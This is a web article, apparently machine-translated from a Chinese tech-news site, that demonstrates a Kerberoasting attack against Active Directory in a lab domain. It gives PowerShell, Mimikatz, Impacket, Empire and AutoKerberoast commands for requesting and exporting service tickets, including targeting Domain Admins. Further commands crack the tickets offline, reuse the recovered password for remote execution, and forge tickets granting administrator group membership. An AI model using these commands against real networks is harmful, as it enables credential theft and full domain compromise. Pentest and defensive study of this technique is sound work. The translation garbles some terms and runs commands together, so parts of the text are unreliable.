Shulou(Shulou.com)06/02 Report--

In this issue, the editor will bring you a demonstration of how to carry out Kerberoast attacks. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

To put it bluntly, a Kerberoast attack is a process in which an attacker tries to crack Kerberos service tickets and rewrite them in order to gain access to the target service. This is a very common attack method among red teams because it does not require any interaction with the service target service, and legitimate active Directory access can be used to request and export service tickets that can be cracked offline to get the final plaintext password. This occurs because the service ticket is encrypted using the NTLM of the service account, so any domain user can dump the hash from the service without introducing shell into the system running the service.

Attackers will usually choose those bills that may be set as weak secret and have a high success rate of code cracking to try to crack. Once attackers successfully crack the ticket, they sometimes gain more than just access to the service, but if the service is configured to run under high privileges, the entire domain may be taken down by the attacker. These notes can be identified by considering a variety of factors, such as:

SPNs binds to domain user account

Last password setting (Password last set)

Password expiration time

Last login (Last logon)

Specifically, a Kerberoast attack involves the following five steps:

Service principal name (SPN) discovery

Request service ticket

Export service ticket

Crack the service ticket

Rewrite Service ticket & RAM injection

In this article on Service Principal name (SPN) Discovery, we have introduced how to find services in the network by querying the service principal name of Active Directory.

Request service ticket

The easiest way to request a service ticket for a particular SPN is through PowerShell, which Tim Medin introduced in the DerbyCon 4. 0 presentation.

Add-Type-AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken-ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"

Executing the klist command lists all available cache tickets.

Klist

Another solution for requesting a service ticket is to specify the service principal name as the target through the Mimikatz.

Kerberos::ask / target:PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80

Similar to klist, the list of Kerberos tickets that exist in memory can be retrieved through Mimikatz. From an existing PowerShell session, the Invoke-Mimikatz script will output all tickets.

Invoke-Mimikatz-Command'"kerberos::list"'

Alternatively, load the Kiwi module and add some additional Mimikatz commands that can perform the same task.

Load kiwikerberos_ticket_list

Or you can execute a custom Kiwi command:

Kiwi_cmd kerberos::list

There is a python module in Impacket that can request Kerberos service tickets that belong only to domain users, which should be easier to crack than computer account service tickets. However, to interact with Active Directory, you need valid domain credentials because it will be executed from a system that does not belong to the domain.

. / GetUserSPNs.py-request pentestlab.local/test

The service account hash will also be retrieved in John the Ripper format.

The PowerShell module developed using Matan Hart, which is part of RiskySPN, can help us automatically identify weak service tickets. The main role is to audit the available service tickets that belong to the user and find the tickets that are most likely to contain weak passwords based on the user account and password expiration time limit.

Find-PotentiallyCrackableAccounts-FullData-Verbose

The script will provide more detailed output than klist and Mimikatz, including group information, password validity and cracking windows.

Executing the same module with the domain parameter returns all user accounts with associated service principal names.

Find-PotentiallyCrackableAccounts-Domain "pentestlab.local"

Service ticket information can also be exported in CSV format for offline viewing.

Export-PotentiallyCrackableAccounts

All ticket information that appears in the console will be written to the file.

There is also a script (part of the same repository) that can get the service ticket for the service instance through its SPN.

Get-TGSCipher-SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"

Tim Medin's Kerberoast toolkit has automated the process. Auto-Kerberoast contains the original script for Tim, which contains two PowerShell scripts that perform various functions, such as listing and exporting service tickets in Base64, John, and Hashcat formats.

List-UserSPNs

There is also a domain parameter that lists only the SPN for a specific domain.

List-UserSPNs-Domain "pentestlab.local" Export Service ticket

Mimikatz is a standard tool for exporting Kerberos service tickets. From a PowerShell session, the following command lists all available tickets in memory and saves them on the remote host.

Invoke-Mimikatz-Command'"kerberos::list / export"'

Similarly, PowerShell Empire has a module that automates the task of extracting Kerberos service tickets.

Usemodule credentials/mimikatz/extract_tickets

The module will automatically execute the following command using the Invoke-Mimikatz function.

Standard::base64kerberos::list / export

Service ticket hashes that support Kerberos authentication can be extracted directly using the PowerShell Empire module. The hash format can be extracted as John or Hashcat.

Usemodule credentials/invoke_kerberoast

This module will retrieve the password hash values of all service accounts.

The AutoKerberoast PowerShell script will request and extract all service tickets in base64 format.

Invoke-AutoKerberoast

There is also a script in the AutoKerberoast repository that displays the extracted ticket in an hashcat compatible format.

Tickets that belong to promotion groups in a specific domain can also be extracted for more targeted Kerberoasting.

Invoke-AutoKerberoast-GroupName "Domain Admins"-Domain pentestlab.local-HashFormat John

The Get-TGSCipher PowerShell module developed by Matan Hart can extract the password hash of the service ticket in three different formats: John,Hashcat and Kerberoast. You can retrieve the service principal name of the associated service required by the script during the SPN discovery process.

Get-TGSCipher-SPN "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"-Format JohnTGSCipher-Service Ticket Hash

The advantage of using the Get-TGSCipher function is that there is no need to use Mimikatz to export the ticket, which greatly reduces the trigger of the alarm and eliminates the step of converting the ticket to john format.

Crack the service ticket

The python script tgsrepcrack, which is part of the Tim Medin Kerberoast toolkit, can crack Kerberos tickets by providing a list of passwords.

Python tgsrepcrack.py / root/Desktop/passwords.txt PENTESTLAB_001.kirbi

Lee Christensen has developed a python script called extractServiceTicketParts, which can extract the hash value of the service ticket for us, as well as a hash cracker tgscrack written in Go, which can be used together.

Python extractServiceTicketParts.py PENTESTLAB_001.kirbi

Tgscrack requires us to specify the local storage path for hash files and dictionary files.

Tgscrack.exe-hashfile hash.txt-wordlist passwords.txt

The password will be displayed in clear text.

If PowerShell remoting is enabled, you can use the password retrieved from the service ticket to perform operations such as remote commands.

Enable-PSRemoting$pass = 'Password123' | ConvertTo-SecureString-AsPlainText-Force$creds = New-Object System.Management.Automation.PSCredential-ArgumentList' PENTESTLAB_001', $passInvoke-Command-ScriptBlock {get-process}-ComputerName WIN-PTELU2U07KG.PENTESTLAB.LOCAL-Credential $creds

The list of running processes will be retrieved

Service ticket rewriting & RAM injection

The Kerberos ticket uses the NTLM hash signature of the password. If the bill hash has been cracked, you can use the Kerberoast python script to rewrite the ticket. This will allow you to impersonate any domain user or spoof an account when the service is about to be accessed. In addition, empowerment is also possible because users can be added to high-privilege groups such as domain administrators.

Python kerberoast.py-p Password123-r PENTESTLAB_001.kirbi-w PENTESTLAB.kirbi-u 500python kerberoast.py-p Password123-r PENTESTLAB_001.kirbi-w PENTESTLAB.kirbi-g 512

Use the following Mimikatz command to re-inject the new ticket into memory to authenticate the target service through the Kerberos protocol.

Kerberos::ptt PENTESTLAB.kirbi above is the demonstration of how to carry out Kerberoast attacks shared by Xiaobian. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.